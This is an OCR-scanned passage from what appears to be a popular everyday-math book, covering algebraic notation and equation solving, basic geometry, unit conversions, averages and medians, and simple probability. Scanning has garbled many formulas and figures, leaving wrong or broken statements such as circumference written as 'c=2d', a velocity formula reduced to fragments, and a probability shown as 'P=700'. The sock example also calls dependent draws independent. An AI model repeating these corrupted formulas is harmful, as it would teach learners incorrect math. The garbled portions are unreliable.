combination of symbols and can be made up of variables, constants, 
or both. That’s it! 


An expression isn’t necessarily equal to anything; it’s like using a 
phrase rather than a whole sentence. Here’s a sample expression, 
made entirely of constants: 

34+4+5 
You can easily add these constants up. 
Here’s an expression made up entirely of variables: 

a+b+c 
In the example, you add some unknown quantity of something (a) 


to an unknown quantity of something else (b) and then add that to 
another unknown quantity (c). 
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You can group variables and constants together to form an 
expression. The most popular way to group constants and variables 
is to place them inside parentheses. For example, here’s an 
expression with four variables, grouped by two sets of parentheses: 


(a+b)+(+d) 


The value in grouping the items (also called terms) is that such 
groupings often make an expression easier to read and a problem 
easier to solve. And to increase flexibility, sometimes ungrouping 
items is useful. 


Getting a handle on equations 


An equation is similar to an expression in that they both are 
combinations of terms. The difference between an equation and 
an expression is that the equation has an equals sign (=). In an 
equation, the expression on the left side of the equals sign is equal 
to the expression on the right side. 


For example, consider these two expressions: 


3+4+7 
5+8+1 
These two expressions aren’t much to write home about, but when 


you relate the expressions in an equation, things get slightly more 
exciting. For example, is the following equation true? 


3+4+7=5+8+1 
A little arithmetic on both sides of the equation gives you this: 
14=14 


What a relief! They are equal. Now in the world of algebra, equations 
containing variables are far more interesting. For example: 


a+b=14 


You don’t know what a and b are yet, but the equation declares 
that their sum is 14. 
Re : í Bese A , 
& The equality relationship in an equation applies to all algebra, from 
the most trivial to the most sophisticated. Equations such as this 
come up a lot in simple word problems. 
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Operating with variables 


You can do the same operations with variables that you do with 
numbers. You can add, subtract, multiply, and divide variables. 
You can also raise them to a power (called exponentiation) or find 
their square roots. You write variables just like numbers. (If you 
want a fancy name for this, the rules are called mathematical 
notation.) Here’s what you need to know: 


When you add and subtract variables: You use the same 
notation you use to add and subtract numbers: 
a+b 
a-b 
a+0 
a-0 

When you multiply variables: You use special notation. You 
don’t use the traditional times sign (x) because it looks too 
much like the variable x. Instead, you use parentheses, a dot 
C), or no sign. For example, all of the following are ways to 
show that you’re multiplying 2 and b. 
2-b 
2(b) 
2b 


1” When you divide variables: You should never use the traditional 
division sign (+). Instead, you express division as a fraction: 


|s Aly NIC 


When you write powers and square roots of variables: You 
write powers and square roots exactly the same way you’d 
write numbers: 


f? 
Jg 
The following equation looks a little complicated, but it’s composed 


entirely of simple variables and a constant. The equation just 
follows the rules of notation. 


_(h)ar? 
za S 
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The previous equation actually does something practical. In one 
algebraic “sentence,” it shows how to calculate the volume of a 
concrete patio in square feet, divide to get cubic yards, and multiply 
by the cost per yard. The result is z, the cost of the concrete for 
the patio. (In pouring ready-mix concrete, yard is the term suppliers 
use for a cubic yard.) 


You can do the same operations with variables that you do with 
numbers, and you need to follow the same rules of arithmetic for 
variables that you follow for numbers. See Chapter 1 for details on 
operations and the rules that apply to them. 


Applying the same operation on 
both sides of the equal sign 


When math in real life gives you a mash-up of facts, you can 
usually make a good equation. But a good equation is just the 
starting point. You need to solve it, too. 


To solve an algebra problem, you must perform the same math 
operations on both sides of the equation. If you do so, the equation 
maintains its equality. That’s essential for problem solving, and it 
works every time. 


For example, here’s an equation that tells you one thing: 
a-7=b+9 


Add 7 to both sides. Because you’re doing the same thing to both 
sides of the equation, you preserve the equality. 


a-7+7=b+9+7 
a=b+16 


Now subtract b from both sides. 


a=b+16 
a-b=b+16-b 
a-b=16 


At this point, you have “cleaned up” the equation. 


An essential tactic in solving many algebra problems is to get all 
variables on one side of the equation. In some cases, you want to 
get one variable on one side of the equation. Both techniques are 
valuable. 
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In the subtraction example, you don’t know the final answer — 
yet — but you can see that a — b = 16. In the addition example, 
you are expressing the value of a in terms of a variable (b) anda 
constant (16). 


This same technique works for other operations, too. In this next 
equation, you multiply both sides of an equation by 2. This isn’t the 
simplest way to the solution, but it shows how performing the same 
operation on both sides of an equation preserves the equality: 


a+3=9 
2(a+3)=2(9) 
2(a+3)=18 


Now to solve this equation, you can get rid of the parentheses on 
the left by multiplying each term in the parentheses by 2. 
2(a+3)=18 
2a+6=18 


To clean the equation up a bit more, subtract 6 from each side. 


2a+6=18 
2a+6—-6=18-6 
2a=12 


You can wrap things up by dividing each side of the equation by 2. 
2a=12 
2a _12 
2 2 
a=6 


The answer is a = 6. Notice that through all the different steps, 
you preserve the equality by doing on one side of the equal sign 
whatever you did on the other side. 


Keeping order with operations 


When equations get complex, you solve them by doing operations 
in the correct order to simplify them. Not surprisingly, this correct 
order is called the order of operations (and sometimes it’s known 
as operator precedence). Here’s the order in which you perform the 
different operations in an equation, arranged from first to last: 
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Terms inside parentheses or brackets 

 Exponents and roots 

/ Multiplication and division 

Addition and subtraction 
The rule of thumb is to work from the “inside out” (starting with 
terms inside parentheses) and make complex expressions (exponents 
and roots) simple. 
For example, simplify 

x = (5-3) + (22 + 6a) - (4a - 3) 


to become 


x=2+22+6a-12a 


Three-for-one equation bonus: Calculating 
speed, time, and distance 


If you drive a car or have ever flown in an airplane, you've probably noticed that 
time, speed, and distance are related. Here’s the basic formula for distance, based 
on speed and time: 


distance = velocity x time 
d=vt 
Distance equals speed multiplied by time. In science, the correct term for speed is 


velocity, represented by v. But wait! As they say on TV, there’s more! The following 
related formulas are also true: 


velocity = “stance 
=f 
ine Sates 
fo 
v 


When you know two of the parts of the formula, you can solve for the third part. If, 
for example, you know the distance you've traveled and the time it has taken, you 
can calculate your average velocity. If you know the distance you've traveled and 
the average velocity, you can calculate the time you've been driving. 


This is a great three-for-one bonus formula, and you'll find other examples in day- 
to-day math. For details, head to Chapter 10. 
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Fortunately, a good equation keeps things separate, with parentheses 
and math signs. Be careful, though, because a bad equation can 

be ambiguous. Don’t blame yourself — unless you made up the 
equation. 


Jousting with Geometry: Simple 
Rules about Shape and Size 


The term geometry comes from the Greek words meaning “earth 
measurement” (even though some contend that it actually translates 
as “causes students pain and suffering”). But for the purposes of 
math you’re most likely to use in real life, you can safely reduce 
the scope of geometry from measuring the earth to measuring for 
a pool, deck, or patio, or for laying out a playing field for soccer, 
badminton, or volleyball. 


Geometry goes back a long way, at least to ancient Egypt and 
Babylonia. It makes sense that when the ruler wanted tax money 
from farmers, the process began by measuring the farmers’ fields. 
That’s where geometry comes in. Euclid, the Greek mathematician, 
gets the credit for giving us formal geometry. He developed principles 
in about 300 BCE, and so Euclidian geometry is the kind of geometry 
you learned in school. It’s very abstract and is based on axioms 
and proofs. Euclidean geometry is fascinating stuff, but it’s not 
very practical for day-to-day problems. 


Looking at geometry’s basic parts: 
Planes, points, and lines 


The geometry used in everyday life is plane geometry and solid 
geometry. Plane geometry is a world of points, lines, and shapes — 
all of which take place on a plane. Solid geometry is a world of 
volumes. 


Plain talk about the plane 


A plane is a flat, two-dimensional surface. Being theoretical, a 
geometric plane is perfectly flat and extends forever in all directions. 
In real life, you draw geometric figures on a flat piece of paper or 
a flat computer screen. If you’re lucky, your lawn is fairly flat, and 
your street is, too. 


To make geometry work, there must be a coordinate system, which 
is a way of describing the position of any object on a plane. 
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The most famous and commonly used coordinate system is the 
Cartesian coordinate system (named after René Descartes, the 
famous French mathematician and philosopher). Figure 2-1 shows 
the Cartesian coordinate system. 
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Figure 2-1: The Cartesian coordinate system. 


The system has two axes (plural for axis). The horizontal axis is 
the x-axis, and the vertical axis is the y-axis. Along each axis are 
points, and the two axes cross each other at point (0,0), called the 
origin. As a bonus, you get four quadrants, named I, Il, Ill, and IV. 


You can describe any position on the plane by naming coordinates. 
In Figure 2-1, the point shown is at coordinate (5,4). Its location is 
5 to the right of the origin and 4 up from the origin. The pair of 
numbers describing a point’s position on the plane is called an 
ordered pair. 


Getting to the point 


The point is the basic building block of geometry. In theory, it has 
no height or width. In real life, it’s about the size of a pencil point 
or the little hole that a pin makes. 


Each point represents a place on the plane. It’s a precise location. 
If the GPS map on your smartphone is a plane, then the blue dot 
(that’s what I’ve got on my phone) is the point where you are. 


In fact, all reading and following of maps amounts to plotting points 
(your locations) on a plane. With the smartphone or a GPS, the 
application does it for you. With a paper map, you do it manually. 


Falling in line 

If the point is the basic building block of geometry, then the line is 
the next step. It should be called “Son of Point, the Sequel.” A line 
is straight, theoretically has length but no width, and continues on 
in either direction without stopping. 
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Walking in a city with a grid layout 


Many cities are laid out in a grid pattern. They often have numbered streets (10th 
Street, 11th Street, and so on) going in one direction, and lettered streets (A Street, 
B Street, and so on) going in the other. Some have numbered avenues instead. 


Say you're in a city with a grid, and you want to get from Point A to Point B. You 
find out that Point B is three blocks east and two blocks north. Here are a couple 
of ways to get there: 


4# Think of point A as (0,0). Go east three blocks. You are now at (3,0). Go north two 
blocks. You have now arrived at Point B (3,2). 


Alternatively, you could go north two blocks, arriving at (0,2). Then you go east 
three blocks, putting you at (3,2). The route is different, but the result is the 
same. 


This technique is common in cities with a grid, and knowing it is handy if you need 
to ask for directions. “Yeah, just go east three blocks and north two blocks. You 
can’t miss it.” Well, if directions such as north, south, east, and west give you 
trouble, make sure the direction-giver points which way to go. 


A straight line is the shortest distance between two points, which 
brings us to the discussion of line segments. Line segments are 
lines that have a beginning and ending point. To be formal, a line 
segment can be represented by its two end points. Figure 2-2 
shows a line with end points (0,0) and (5,0). 


(0,0) (5,0) 
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Figure 2-2: A line segment. 


The line is common in life. It has hundreds of uses and has populated 
our vocabulary. Think “walk the line,” “draw the line,” and “that’s a 
line if I ever heard one.” 


If you like to spend your evenings working out first-degree 
polynomial functions of one variable, you'll see a lot of lines. But if 
that’s not useful or fun, you also use lines in laying out fencing for 
your house or for drying clothes on a clothesline. They’re the same 
thing. 


Thanks to the line and the point, you can do some excellent things 
with angles, shapes, areas, and volumes. 
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What’s your angle? Acute, obtuse, 
right angles, and more 


Geometry includes a lot of angles, and you should know them. An 
angle is a geometric figure made up of two lines, joined at an end 
point called the vertex. In an angle, the lines go on forever and are 
known as rays. 


Angles come in just a few flavors, based on how wide or narrow 
they are. Angles are measured in degrees. The smallest angle is 
theoretically 0 degrees, but that’s very boring. The largest angle is 
360 degrees, which is a full sweep. That’s what 12:00 PM looks like 
on a clock. Figure 2-3 shows various types of angles. 


Lk oe 


Acute Right Obtuse Straight 
Reflex Full rotation 
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Figure 2-3: Types of angles. 


Here are angle basics: 


Acute: This angle is less than 90 degrees. 
Right: This angle is exactly 90 degrees. 


 Obtuse: This angle is greater than 90 degrees but less than 
180 degrees. 


Straight: This angle is 180 degrees and doesn’t look much like 
an angle. 


Reflex: This angle is greater than 180 degrees but less than 
360 degrees. 


Full rotation: This angle is 360 degrees and doesn’t look much 
like an angle. 


You should know your angles in order to communicate with 
others. In some cases, you actually use angles. 


If you’re involved with crafts or woodworking, you probably 
need to cut things at angles. 
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If you go to the picture framing shop, you can ask the 
salesperson what angle the bevel-cut matte will be. 


When you talk to the carpet layer, you can describe an odd- 
shaped room’s angles. 


If you help your kids with math, you’ll look smart and save 
yourself embarrassment. 


The shape of things 


The world is filled with fascinating shapes, both beautiful and 
practical. Although many shapes exist, life is short, so this section 
describes only three of them — rectangles, triangles, and circles, 
which just happen to be the ones you'll use most often in your 
real-life math problems. 


Rectangles and squares 

A rectangle is a four-sided figure. It has a length and a width, and 
each corner is a right angle. A square is a special rectangle. The 
length and width are the same. Figure 2-4 shows a square and a 
rectangle. 


A D A D 


c B 
Square Rectangle 
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Figure 2-4: A square and a rectangle. 


Triangles 


A triangle is a three-sided figure. Triangles come in several flavors, 
and each one has its own name. 


Figure 2-5 shows different types of triangles. Here are triangle 
basics: 


Acute triangle: The angles of an acute triangle are all less 
than 90 degrees. 


Right triangle: A right triangle has one angle of exactly 
90 degrees. 


 Obtuse triangle: An obtuse triangle has one angle greater 
than 90 degrees. 
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 Isosceles triangle: An isosceles triangle has two sides of equal 
length and, therefore, two angles with the same value. 


 Equilateral triangle: All three sides of an equilateral triangle 
are equal in length; therefore, the three angles have the same 
value. 


 Scalene triangle: A scalene triangle has sides of three differ- 
ent lengths and therefore three different angles. 


C 
<90° 
o 90° >90° 
B 
Right Obtuse 
Isosceles Equilateral Scalene 
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Figure 2-5: A variety of triangles. 


Round and ‘round you go: Circles 


A circle is a shape in which every point on the edge is the same dis- 
tance from the center. That distance is the radius. Figure 2-6 shows 
the parts of a circle. 


Circumference 


Diameter 
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Figure 2-6: Parts of a circle. 


Here’s what you need to know about circles: 


Radius: The radius is the distance from the center to the 
edge, known in formulas as r. 


Diameter: The diameter is the distance across the circle, 
through the center. The diameter (also called d) is equal to 
2 times the radius, or 2r. 
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Circumference: The circumference is the distance around a 
circle, known in formulas as c. 


Calculating areas 


An area is a quantity of two-dimensional space. You need to know 
about three areas: areas of the rectangle, triangle, and circle. 
Fortunately, the area formulas you’re likely to use are both easy to 
understand and easy to use. By the way, it doesn’t matter whether 
you're talking about square inches or square miles; the formulas 
are the same. 


Finding the area of squares and rectangles 


The formula for calculating the area of a rectangle is very simple: 
You simply multiply the rectangle’s length by its width. Figure 2-7 
shows a rectangle’s length and width. 


E 


Length 
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Figure 2-7: The length and width of a rectangle. 


PIM 


The official formula looks like this: 


area = length x width 
a=lw 


Finding the area of triangles 


The area of a triangle is also easy to calculate. Every triangle has a 
base and a height. Figure 2-8 shows a triangle’s base and height. 


19948 


10 feet 
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Figure 2-8: A triangle’s base and height. 
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The formula for calculating the area of a triangle is also very 
simple. Just multiply the base by the height and divide by 2: 


base x height 
area =—— 5 


Finding the area of circles 


The area of a circle is easy, too. Use the radius of the circle, shown 
in Figure 2-9, and the “magic” number pi (7), which is approxi- 
mately 3.14159. 


Illustration by Wiley, 
Composition Services 
Graphics 


Figure 2-9: A circle’s radius. 


To find the area of a circle, use this simple formula, in which you 
multiply 7 by the radius squared: 


a=nr’ 


Getting pushed to the 
edge: Perimeters 


The distance around a geometric figure, such as a square, rect- 
angle, or triangle, is called the perimeter. The word comes from the 
Greek peri (around) and meter (measure). In the case of a circle, 
the perimeter gets a special name — circumference. Figure 2-10 
shows the perimeter of a rectangle. 


Knowing a perimeter is handy (and some say essential) for measur- 
ing fencing, a paddock, a circular exercise ring, or bender boards 
for flower beds. 
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Figure 2-10: The perimeter of a rectangle. 


You can find a rectangle’s perimeter, using one of the following 
methods: 


Measure each side and add the numbers up. 


Double the length and double the width and add them 
together. The formula is 


p=2l+2w 


In the special case of a square, where all four sides are equal, 
just multiply the length of one side by 4. 


To find the perimeter of a circle, use the famous (but common) 
circumference formula, in which you multiply n by the circle’s 
diameter: 


c=2d 


Speaking volumes about boxes 


Volume is a quantity of three-dimensional space. That space has 
length, width, and height. The official name for a box-shaped item 
is cuboid. The unofficial name is box. Figure 2-11 shows a cuboid. 


Think of volume as a measure of “how much of something” you 
are buying or using. While some items are measured by length or 
weight, volume is the standard measure for almost all liquids. 


Length 
Illustration by Wiley, 
Composition Services 
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Figure 2-11: A cuboid, or (in plain English) box. 
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A math secret 


The liter and the milliliter are very important, even in the non-metric United States. 
Medicine and science rely on these units. The nurse or scientist usually dispenses 
liquids, and the liter and milliliter are actually measures of cubic volume, based on 
length, width, and height. One liter (1 L) is the volume of a cube with dimensions 
of 10 centimeters (10 cm) on each side. One milliliter (1 mL) is one-thousandth of 
a liter, which is the vo/ume of a cube with dimensions of one centimeter (1 cm) on 
each side. 


The common units of volume are cubic inches or cubic centime- 
ters (which you’d want to know to determine engine displace- 
ment), cubic feet or liters (good for comparing refrigerator 
capacities), and cubic yards or cubic meters (the units that specify 
how much ready-mix concrete you need). 


In addition, we buy many items around us by liquid measure (a 
1-gallon jug, for example). The gas tank in your car is described 

by its capacity in gallons or liters. Even the storage lugs in your 
garage have capacities labeled in gallons or liters. Firewood is sold 
by the cord (which, interestingly, is defined by law in most states 
of the U.S. and typically refers to a stack of wood 4 feet wide, 4 feet 
high, and 8 feet long — 128 cubic feet). 


As part of your brief education or review of geometry, you should 
be able to calculate the volume of a cuboid. The formula is very 
simple: 


volume = length x width x height 
v=lwh 


To see a real-life example of a cuboid, go to one of the popular 
rent-a-truck moving companies. Ask for a book box. Its dimensions 
are 12 inches x 12 inches x 12 inches. Because 12 inches are ina 
foot, that’s 1 foot x 1 foot x 1 foot, giving a volume of 1.0 cubic foot 
(because 1 x 1x1 = 1). 


Summing up geometry 


If you read the preceding sections from beginning to end, you may 
have noticed that I arranged the info to go from points to lines to 
flat shapes (rectangles, squares, triangles, and circles) to cuboids. 
Those items fit in dimensional space (as the mathematicians say) in 
an orderly way. 
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Table 2-1 summarizes the common geometric shapes out in the 
world, showing the name, the dimension they “live in,” and what 
you measure or calculate. 


Table 2-1 Geometric Shapes 

Name Dimension Measurement 
Point 0 Position 

Line 1 Length 
Rectangle, square, triangle, circle 2 Area 


Cuboid 3 Volume 


46 Part I: Boning Up on Math Basics 


Chapter 3 


Becoming a Believer: 
Conversion, Statistics, 
Probability, and More 


In This Chapter 


Using the ratio-proportion formula 
Understanding conversions 

Interpreting basic statistics 

Knowing your chances through probability 


J math problems in real life take many forms. Although these 
problems can be a challenge, their solutions take only a few 
forms. Basic arithmetic (the topic of Chapter 1) handles a lot, from 
figuring mortgage interest to calculating cantaloupes. And basic 
algebra (which you can read about in Chapter 2) takes care of 
most of the rest. 


Then the basics evolve into specialties like statistics, conversions, 
and probability. Fortunately, the real-life math you’ll encounter 

in these areas involves math you already know how to do. For 
example, two common statistics are based on addition, division, 
and counting, and unit conversions are based on multiplication 
and division. 


The same is true of probability. The math for basic calculations is 
simple. You need only to know some terms and how to apply them. 


In this chapter, I explain the basic principles of conversion, sta- 
tistics, and probability, and show you the greatest formula ever, 
which is almost a universal problem solver. As a bonus, I give you 
a brief rundown of the best tools to use to handle real-life math. 
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Wrangling Ratio-Proportion: 
The Best Calculation Method 


If 1 (of something) gets you 2 (of something else), then 2 gets you 
4. That, in a nutshell, is the entire concept of ratio-proportion. 


To understand, you first need to know what a ratio is. A ratio is the 
relationship between two quantities. Some ratios are obvious. For 
example, if 8 slices are in 1 pie, the ratio is 8 slices per pie and it’s 
presented mathematically like this: 


a 


b 


Ratio-proportion is simply a calculation method that compares two 
ratios. The two ratios amount to four items. If you know three of 
them, you can solve for the fourth. 


A proportion is the relationship between four quantities, shown in 
the following equation. You say this equation as “a is to bas c is to 
d.” The first item divided by the second is equal to the third item 
divided by the fourth. 


a c 
b d 
A proportion doesn’t change. For example, if 1 cup of flour pro- 


duces 8 pancakes, the proportion is the same whether you’re using 
100 or 1,000 cups of flour. 


A ratio-proportion equation has a ratio on the left that’s equal to 
another ratio on the right. Going back to the 8 slices in a pie exam- 
ple, a ratio-proportion question might ask how many slices are in 2 
pies. This one’s easy (as pie). There are 16 slices in 2 pies. Here’s 
the structure for solving a ratio-proportion problem, using the pie 
example: 


known equivalent _ known equivalent 
known equivalent desired equivalent 


1 pie 2 pies 
8 slices x slices 
x=2x8 
x=16 


The math amounts to multiplying a (1 pie) by d (x slices) and b 
(8 slices) by c (2 pie), in a maneuver called cross-multiplying. 
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You can also flip the both sides upside down, but you still have to 
cross-multiply: 


known equivalent _ desired equivalent 
known equivalent known equivalent 


8 slices _ x slices 


l pie 2 pies 
2x8=x 
16=x 


Try out ratio-proportion. Say you have 2 bags of apples with 6 
apples in each bag. Your crazy uncle just gave you 81 bags. How 
many apples did he give you? 


1. Set up the problem. 
known quantity _ known quantity 
known quantity desired quantity 


2 bags 81 bags 
12 apples total number of apples 


2. Cross multiply to solve. 
2 _ 81 


12 x 
2x=12x81 
2x =972 
x = 486 


The answer is 486 apples. 


Doing Conversions: Lots of 
Pleasure and Hardly Any Pain 


The world is the product of thousands of years of civilization. 
That’s good. But those millennia have produced many different 
systems of measurement. That’s bad. 


The situation is worse when you need to convert quantities (like 
distance, weight, and volume) from one measurement system to 
another. It’s especially difficult in the United States, because the 
main system in the U.S. is American units, while the rest of the 
world uses the metric system. 


No problem! With a little understanding and the right tools, you 
will be a conversion whiz. Understanding takes a little effort, and 
the tools are free. 
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Factoring in the conversion factor 


A conversion factor is a simple formula that lets you convert from 
one unit to another. Conversion factors are fast, fun, friendly, and 
common in everyday life. You probably know a bunch of them 
already. For example, here are a couple of conversion factors: 
Twenty-four hours are in a day, and 12 inches are in a foot. 


For conversion factors you don’t know, here’s a simple math 
secret: To convert from one unit to another, you either multiply or 
divide. You just need to know what value to multiply or divide by. 


A simple example is converting feet to yards. Say you want to know 
how many yards are in 81 feet. You know a yard has 3 feet. So you 
divide 81 feet by 3 to get yards. Here’s the equation: 


Yards = feet 
Yards = st 
Yards = 27 


To find any conversion factor you don’t already know, go to 
http: //www.google.com and enter the conversion you want. 
For example, enter “feet to miles,” “tons to pounds,” and so forth. 
Almost everything produces an immediate display on the “pre- 
search,” and you only have to click on that. 


Using United States customary units 


United States customary units (the “American system”) are mea- 
surements used in the United States. The basic units are 
Length: inch, foot, yard, mile 
Area: acre, square foot 
Volume: cubic inch, cubic foot, cubic yard 


Liquid volume: fluid ounce, pint, quart, gallon, teaspoon, 
tablespoon, cup 


Weight (mass): ounce, pound, ton 


The easiest way to convert between units of the American system 
or from American to metric is to use an Internet calculator. 


You can display the conversion factor online with no effort. Go to 
http: //www.google.com and enter the conversion you want. 


ar 
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The preceding has more details on using online conversion calcu- 
lators. (If you’re working in the kitchen — where most real-life con- 
version conundrums occur — head to Chapter 6 for a handy-dandy 
conversion chart.) 


Managing the metric system 


The metric system is officially called the International System of 
Units. Most of the world, except for three countries (the United 
States, Liberia, and Burma/Myanmar), uses the metric system. The 
basic units in the metric system are 

Length: meter, kilometer 

Area: hectare 

Volume: liter 

Weight (mass): kilogram, tonne 
Metric units are easy, because every unit is a multiple of ten of 
another unit. The easiest ways to convert between metric units or 
from metric to American units is to use an Internet calculator. You 


can also display conversion factors online with no effort. See the 
earlier section, “Factoring in the conversion factor” for details. 


If you work in medicine or science, you’re practically home free, 
because you work with metric units all the time. 


Temperature is expressed in degrees Fahrenheit in the United 
States and in degrees Celsius in the rest of the world. To convert 
from Fahrenheit to Celsius, use this formula: 

°C = (CF - 32) x 5/9 


To convert from Celsius to Fahrenheit, use this formula: 


°F = Cx 9/5 + 32 


Mastering Simple Statistics 


Statistics is the study of data. A person collects data, organizes 
it, draws inferences from it, and presents it (usually in tables or 
charts). You can be sure that businesses, scientists, government 
agencies, medical researchers, and economists create and use 
statistics a lot. And there’s a specialty: A professional number 
cruncher is a statistician. 
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Statistical information (stats) can be your friend. The world’s filled 
with uncertainty, but statistics help you make decisions in the face 
of uncertainty. 


For example, many people want to see how home prices or home 
mortgage interest rates are trending. The trend might give you an 
indication of when to buy if you want to save big money. Similarly, 
watching how your salary increases are trending can help you draw 
some conclusions. If it’s trending at about 1 percent per year (not 
good!), you know you probably aren’t going to see a big difference 
next year or the year after. In the following sections, I tell what you 
need to know about statistics to make educated assessments of data. 


Don’t use statistics blindly. The old joke is “Did you hear about the 
statistician who drowned in a river with an average depth of 3 feet?” 


An average is a mean thing 


An average (also known as an arithmetic mean) is the result of 
adding up numbers in a collection and dividing by the number of 
items in the collection. Here’s the equation: 


sum of items 


Average = = m > 
8 number of items 


The nice thing about averages in real life is that you see a lot of 
them. Two common averages are average bowling score and grade 
point average (GPA). Of course, you can average just about any- 
thing, if the results will be meaningful to you. For example, you 
might average several weeks of grocery purchases to get a broad 
view of what you’re spending (an exercise that’s great when you’re 
trying to predict spending when you create a budget, as I explain 
in Chapter 10). To get your weekly average grocery bill, you would 
follow these steps: 


1. Add the total purchases. 
Total = $45.00 + $50.00 + $45.00 + $125.00 + $20.00 
Total = $285.00 
2. Divide by the number of times you bought groceries. 


$285.00 
5 


Average = $57.00 


Average = 


One week you spent $125.00 (maybe you had a big family dinner). 
The next week you spent far less (maybe you were eating left- 
overs), and the other amounts are all pretty similar (between $45 
and $50). But taken all together, the average is $57.00. 
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Mediating the median 


The median is the number that separates the upper half of a sample 
from the lower half. A median is not the same as an average. You 
simply arrange the values in order from lowest to highest and find the 
number in the middle of the list. That’s your median value. If the list 
has an even number of items, you average the two middle numbers. 


You can easily find some medians. Say you want to find the median 
prices of the eight homes that recently sold in your neighborhood. 
Follow these steps: 


1. Record the prices of the recent sales. 
Say the houses sold for these amounts: 


$196,000; $175,000; $190,000; $199,000; $220,000: 
$193,000; $187,000; and $195,000 


2. Arrange the values in order from lowest to highest. 


$175,000; $187,000; $190,000; $193,000; $195,000; 
$196,000; $199,000; $220,000 


3. Count halfway through the items. 


The number in the middle is the median. If the list has 

an even number of items (as it does here), average the 
two middle members, which in this case are $193,000 

and $195,000. The median price of the recently sold homes 
is $194,000. 


Statisticians like medians, because unlike averages, medians usually 
don’t get distorted by outliers. Averages can be misleading if you 
don’t know what to look for. For example, the median 2010 price of 
a home in the United States was $221,800, but the average price was 
$272,900. Here, the average price is higher than the median price, 
and the likely cause is that a small number of very expensive homes 
raised it. Remember, you interpret the median to mean that half the 
homes had prices of less than $221,800, and half had greater prices. 


Medians work best with large samples and a fairly even distribution 
of values. 


Figuring percentiles 


A percentile is a number between 0 and 100. It’s a value below 
which a certain percent of scores fall. For example, if you score at 
the 70th percentile of a test, your score is greater than 70 percent 
of other people taking the test. If you score at the 50th percentile, 
that’s the right in the middle. 
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The 25th percentile is also called first quartile (Q1), the 
50th percentile is the second quartile (Q2), and the 75th percentile 


Q 
s 
V is the third quartile (Q3). 


KA 


You can calculate test percentiles yourself, provided you know the 
number of people taking the test and their scores. Say 30 people 
take a test. You scored 89 out of 100 points. You see that 24 of the 
30 test takers (which is 80 percent of them) scored below 89. Your 
score is greater than 80 percent of the other people, putting you in 
the 80th percentile. 


You tend to read percentiles more than calculate them. If you 
visit the U.S. Bureau of Labor Statistic and check any career (your 
current one or maybe one you’d like to get into), you’ll see some 
salary percentiles. 


Being aware of statistical fallacies 


Beware of misleading statistics, which can occur in business, 
government, and politics. Benjamin Disraeli, the great British 
prime minister, is supposed to have said, “There are three kinds 
of lies: lies, damned lies, and statistics.” Often, the problem is a 
false implication that’s accidental. But sometimes statistics seem 
designed to be misleading. Keep your analytical thinking cap on! 


Are you SATisfied? 


On some tests, such as the SAT, the raw score is the number of points gained from 
correct answers less the number of points lost from incorrect answers. 


The SAT has three parts, each with a score value of 200 to 800 points, and a 
maximum score of 2,400 points. In 2011, the average score in the United States was 
1500: 489 for writing, 514 for math, and 497 for critical reading. 


Bluntly, these average scores probably won't get you admitted to a first-class 
college. You need to score at the 90th percentile or above. To score at the 
impressive 98th percentile, try for a score of 2250: 750 for writing, 760 for math, and 
750 for critical reading. 


But don't despair if your SAT score isn't quite what you want it to be. In the 
admission process, colleges also consider GPA, extracurricular activities, and 
other factors. 
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Bogus statistics can produce major problems in decision-making 
and could possibly cause disastrous consequences. Distortions 
come in many forms. Here are four: 


Misuse of rate-of-change data: Rate of change isn’t change. 
Rate of change can make it appear that some declines (such 
as unemployment) and some increases (such as salary) are 
big when they aren’t. If your salary went up 1 percent last 
year and 2 percent this year, for example, that’s change — a 
change of 1 percent and 2 percent. The distortion comes if 
your boss says “Your salary increase doubled, compared 
to last year.” Yes, 2 percent is double 1 percent and is 
mathematically correct, but that’s not a big deal. 


Distorted visual representations: Charts can contain 
distortions. For example, Figure 3-1 shows a proposed 
4.6 point increase in the highest income tax rate (from 
35 percent to 39.6) in a way that makes the change appear to 
be much larger than it is. If the chart showed the entire length 
of the bars (from 0 to 35 and 0 to 39.5), the visual would show 
that the increase isn’t dramatic. Instead, the chart seems to 
show that the second bar is 6 times the height of the first bar. 
Such distortions are sometimes accidental but are frequently 
deliberate. 


 Cherry-picking and using meaningless stats: Beware of 
stats that either don’t answer the question asked or that 
try to put a good spin on bad news. For example, imagine a 
school claiming a graduation rate of over 90 percent. Sounds 
great, right? Now imagine that the school, in doing its 
calculations, didn’t count a large number of students who had 
dropped out. 


Distortions in your mind: Most statistics apply to large 
groups. They don’t apply to individual cases, so don’t let 
your mind create a distortion. For example, if you read that 
10 percent of people in a certain group will die of cancer, don’t 
count out ten friends and convince them that one of your 
group is at death’s door. 


42% 
39.6% Lao 
-38 
35% 36 
34 
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Figure 3-1: Distorted visual representation. 
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Always feel free to question statistics. Granted, you don’t have 
time to prove them all, but stay alert. 


Predicting the Probable 


Many events can’t be predicted with certainty, so people look at 
the likelihood that events will occur. Enter probability. Probability, 
at its simplest, is the number of cases where an event will happen 
compared to the total number of possible outcomes. 


Probability is essential to the insurance and gaming (gambling) 
industries. It’s also used in medicine, science, and engineering — 
wherever there are complex systems and only partial knowledge. 


Most often, you are a consumer of probabilities that someone else 
develops. However, you can always do your own probability 
experiments and draw your own conclusions from the results. 


Determining probability 


As stated, probability compares the cases where an event will 
happen to the total number of possible outcomes. Probability is a 
value between 0 (it will never happen) and 1 (it’s an absolute 
certainty). 


The sun has such a good record for rising in the morning that you 
can safely assign the event a probability of 1. I have such a poor 
likelihood of becoming a rock star that you can safely assign the 
event a probably of 0. Other events fall somewhere in between. For 
example, a die has six sides with dots (pips) representing 1, 2, 3, 4, 
5, and 6. Using the formula for probability, the chances of rolling a 
lare 


pal 


The formula looks exactly like a fraction or division problem. You 
says this as “The probability is 1 in 6 (or 1/6) that Pll roll a 1.” You 
can also say, “My chances are 1 in 6 that Pll roll a 1.” 


By the way, no matter what your roll, one of the numbers will 
come up. To see the probability of rolling a 1, 2, 3, 4, 5, or 6, add 
the individual probabilities. 


1.1.1.1 
6 6t6"6 
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Here’s another example. Suppose you have 20 socks in a drawer 
and only 2 of them are red. What’s the probability of pulling out a 
red sock? Compare the number of desirable outcomes (getting a 
red sock) to the total number of outcomes: 


eae 
P= 30 
= de 
P70 


There’s 1 chance in 10 that you’ll pull out a red sock. 


What’s the probability of pulling out 2 red socks in a row? Keep in 

mind that pulling out the second red sock is an independent event 
that has nothing to do with pulling out the first red sock. The only 

consequence of pulling out the first sock is that now you now have 
only 19 socks in the drawer. 


The probability of two favorable events (getting the first red 
sock and then getting the second) is the product of their two 
probabilities — 1 chance in 10 for the first sock and 1 chance in 
19 for the second sock: 


1 
0 * 
1 
9 


al- 


p 
P=700 


190 
